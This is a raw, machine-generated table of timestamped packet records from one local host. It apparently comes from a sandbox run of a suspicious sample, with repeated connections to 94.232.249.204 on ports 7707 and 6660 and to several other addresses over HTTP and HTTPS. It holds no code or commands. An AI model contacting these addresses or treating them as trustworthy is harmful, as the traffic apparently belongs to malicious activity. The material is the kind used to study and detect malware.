                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.336802006 CEST8049875188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.336818933 CEST8049875188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.336869001 CEST8049875188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.336926937 CEST4987580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.337122917 CEST44349874162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.337151051 CEST4987580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.337196112 CEST44349874162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.337300062 CEST49874443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.337852001 CEST8049875188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.337944031 CEST4987580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.340791941 CEST4987580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.340794086 CEST49874443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.411668062 CEST49876443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.411686897 CEST44349876162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.411961079 CEST49876443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.411961079 CEST49876443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.411984921 CEST44349876162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.456310034 CEST4987780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.461141109 CEST8049877188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.461616993 CEST4987780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.461673021 CEST4987780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.468349934 CEST8049877188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.468810081 CEST4987780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.474627018 CEST8049877188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.930953979 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.936055899 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.936146021 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.941174984 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.072374105 CEST44349876162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.073926926 CEST49876443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.073949099 CEST44349876162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.172996044 CEST8049877188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.173892975 CEST8049877188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.173940897 CEST4987780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.178141117 CEST4987780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.284507036 CEST4987880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.291922092 CEST8049878188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.291985035 CEST4987880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.292021990 CEST4987880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.300739050 CEST8049878188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.300781965 CEST4987880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.305790901 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.308439970 CEST8049878188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.346323013 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.441499949 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.498215914 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.505506992 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.505556107 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.510413885 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.804269075 CEST44349876162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.804328918 CEST44349876162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.804488897 CEST49876443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.804902077 CEST49876443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.855102062 CEST4987980192.168.2.4104.16.184.241
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.859664917 CEST49880443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.859680891 CEST44349880162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.860028028 CEST49880443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.860028028 CEST49880443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.860052109 CEST44349880162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.860272884 CEST8049879104.16.184.241192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.860341072 CEST4987980192.168.2.4104.16.184.241
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.860553026 CEST4987980192.168.2.4104.16.184.241
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.867341042 CEST8049879104.16.184.241192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.015081882 CEST8049878188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.016045094 CEST8049878188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.016108990 CEST4987880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.018394947 CEST4987880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.128509045 CEST4988180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.133807898 CEST8049881188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.133960962 CEST4988180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.134119034 CEST4988180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.139235020 CEST8049881188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.139416933 CEST4988180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.144224882 CEST8049881188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.344912052 CEST8049879104.16.184.241192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.471754074 CEST4987980192.168.2.4104.16.184.241
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.515552998 CEST44349880162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.519756079 CEST49880443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.519769907 CEST44349880162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.565388918 CEST49882443192.168.2.4172.67.196.114
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.565417051 CEST44349882172.67.196.114192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.565490007 CEST49882443192.168.2.4172.67.196.114
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.571757078 CEST49882443192.168.2.4172.67.196.114
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.571768045 CEST44349882172.67.196.114192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.593585014 CEST498686660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.593988895 CEST498836660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.598500013 CEST66604986894.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.598731995 CEST66604988394.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.599303961 CEST498836660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.599766016 CEST498836660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.605601072 CEST66604988394.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.892610073 CEST8049881188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.893168926 CEST8049881188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.893224001 CEST4988180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.897305965 CEST4988180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.044420004 CEST44349882172.67.196.114192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.044507027 CEST49882443192.168.2.4172.67.196.114
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.047687054 CEST49882443192.168.2.4172.67.196.114
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.047692060 CEST44349882172.67.196.114192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.047879934 CEST44349882172.67.196.114192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.103140116 CEST44349880162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.103195906 CEST44349880162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.103250027 CEST49880443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.186050892 CEST49880443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.226881027 CEST4988480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.233236074 CEST8049884188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.233305931 CEST4988480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.235518932 CEST4988480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.236954927 CEST49882443192.168.2.4172.67.196.114
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.240468025 CEST8049884188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.240536928 CEST4988480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.245678902 CEST8049884188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.249296904 CEST49882443192.168.2.4172.67.196.114
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.267498016 CEST49885443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.267517090 CEST44349885162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.267580032 CEST49885443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.267870903 CEST49885443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.267880917 CEST44349885162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.292510033 CEST44349882172.67.196.114192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.926650047 CEST44349885162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.931762934 CEST49885443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.931791067 CEST44349885162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.039648056 CEST8049884188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.039664984 CEST8049884188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.043592930 CEST4988480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.043592930 CEST4988480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.159414053 CEST4988680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.168834925 CEST8049886188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.168982029 CEST4988680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.168982029 CEST4988680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.179518938 CEST8049886188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.179739952 CEST4988680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.189644098 CEST8049886188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.234683990 CEST66604988394.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.234914064 CEST498836660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.407028913 CEST44349882172.67.196.114192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.407093048 CEST44349882172.67.196.114192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.407366037 CEST49882443192.168.2.4172.67.196.114
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.409960032 CEST49882443192.168.2.4172.67.196.114
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.409960985 CEST4987980192.168.2.4104.16.184.241
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.410955906 CEST49887443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.410990953 CEST44349887149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.411845922 CEST49887443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.415448904 CEST8049879104.16.184.241192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.415486097 CEST49887443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.415502071 CEST44349887149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.415533066 CEST4987980192.168.2.4104.16.184.241
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.512398958 CEST44349885162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.512475967 CEST44349885162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.516052008 CEST49885443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.516210079 CEST49885443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.046327114 CEST44349887149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.046396017 CEST49887443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.047950029 CEST49887443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.047957897 CEST44349887149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.048178911 CEST44349887149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.049345016 CEST49887443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.049370050 CEST44349887149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.225071907 CEST44349887149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.225122929 CEST44349887149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.225168943 CEST49887443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.226871014 CEST49887443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.235297918 CEST49888443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.235333920 CEST44349888149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.235404968 CEST49888443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.235701084 CEST49888443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.235717058 CEST44349888149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.802556992 CEST4988980192.168.2.4104.16.184.241
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.807565928 CEST8049889104.16.184.241192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.807665110 CEST4988980192.168.2.4104.16.184.241
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.807845116 CEST4988980192.168.2.4104.16.184.241
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.812999964 CEST8049889104.16.184.241192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.865593910 CEST44349888149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.869206905 CEST49888443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.869235039 CEST44349888149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:42.192111969 CEST44349888149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:42.192176104 CEST44349888149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:42.192259073 CEST49888443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:42.192763090 CEST49888443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:42.274327040 CEST8049889104.16.184.241192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:42.346323013 CEST4988980192.168.2.4104.16.184.241
                                                                                                                                                                                                                                Jul 6, 2024 13:28:42.635520935 CEST49890443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:42.635570049 CEST44349890149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:42.635765076 CEST49890443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:42.682323933 CEST49890443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:42.682342052 CEST44349890149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:42.751862049 CEST49891443192.168.2.4172.67.196.114
                                                                                                                                                                                                                                Jul 6, 2024 13:28:42.751889944 CEST44349891172.67.196.114192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:42.751976967 CEST49891443192.168.2.4172.67.196.114
                                                                                                                                                                                                                                Jul 6, 2024 13:28:42.755619049 CEST49891443192.168.2.4172.67.196.114
                                                                                                                                                                                                                                Jul 6, 2024 13:28:42.755634069 CEST44349891172.67.196.114192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:43.296432972 CEST44349891172.67.196.114192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:43.296506882 CEST49891443192.168.2.4172.67.196.114
                                                                                                                                                                                                                                Jul 6, 2024 13:28:43.297882080 CEST49891443192.168.2.4172.67.196.114
                                                                                                                                                                                                                                Jul 6, 2024 13:28:43.297888994 CEST44349891172.67.196.114192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:43.298110962 CEST44349891172.67.196.114192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:43.440073013 CEST49891443192.168.2.4172.67.196.114
                                                                                                                                                                                                                                Jul 6, 2024 13:28:43.519501925 CEST49891443192.168.2.4172.67.196.114
                                                                                                                                                                                                                                Jul 6, 2024 13:28:43.560503006 CEST44349891172.67.196.114192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:43.627314091 CEST44349891172.67.196.114192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:43.627361059 CEST44349891172.67.196.114192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:43.627439022 CEST49891443192.168.2.4172.67.196.114
                                                                                                                                                                                                                                Jul 6, 2024 13:28:43.630425930 CEST44349890149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:43.642348051 CEST49891443192.168.2.4172.67.196.114
                                                                                                                                                                                                                                Jul 6, 2024 13:28:43.646131992 CEST49892443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:43.646171093 CEST44349892149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:43.646244049 CEST49892443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:43.646576881 CEST49892443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:43.646588087 CEST44349892149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:43.647700071 CEST4988980192.168.2.4104.16.184.241
                                                                                                                                                                                                                                Jul 6, 2024 13:28:43.652934074 CEST8049889104.16.184.241192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:43.655314922 CEST4988980192.168.2.4104.16.184.241
                                                                                                                                                                                                                                Jul 6, 2024 13:28:43.752571106 CEST49890443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.018125057 CEST49890443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.018155098 CEST44349890149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.063422918 CEST8049886188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.063940048 CEST8049886188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.063988924 CEST4988680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.068644047 CEST4988680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.217181921 CEST4989380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.222037077 CEST8049893188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.222115040 CEST4989380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.222148895 CEST4989380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.226907969 CEST8049893188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.226982117 CEST4989380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.231875896 CEST8049893188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.246550083 CEST44349890149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.253916025 CEST44349892149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.254008055 CEST49892443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.255399942 CEST49892443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.255408049 CEST44349892149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.255631924 CEST44349892149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.256911993 CEST49892443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.256946087 CEST44349892149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.350668907 CEST49890443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.350680113 CEST44349890149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.352135897 CEST49890443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.352140903 CEST44349890149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.352266073 CEST49890443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.352282047 CEST44349890149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.355808973 CEST49890443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.355825901 CEST44349890149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.357490063 CEST49890443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.357511997 CEST44349890149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.357585907 CEST49890443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.357604027 CEST44349890149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.357621908 CEST49890443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.357625961 CEST44349890149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.357660055 CEST49890443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.357670069 CEST44349890149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.357728004 CEST49890443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.357734919 CEST44349890149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.358062983 CEST49890443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.358067989 CEST44349890149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.430104971 CEST44349892149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.430145979 CEST44349892149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.430214882 CEST49892443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.443717003 CEST49892443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.452930927 CEST49894443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.452961922 CEST44349894149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.453032017 CEST49894443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.453506947 CEST49894443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.453521013 CEST44349894149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.914000988 CEST44349890149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.914078951 CEST44349890149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.914149046 CEST49890443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.914655924 CEST49890443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.927882910 CEST49895443192.168.2.4172.67.19.24
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.927903891 CEST44349895172.67.19.24192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.928200960 CEST49895443192.168.2.4172.67.19.24
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.928492069 CEST49895443192.168.2.4172.67.19.24
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.928503036 CEST44349895172.67.19.24192.168.2.4
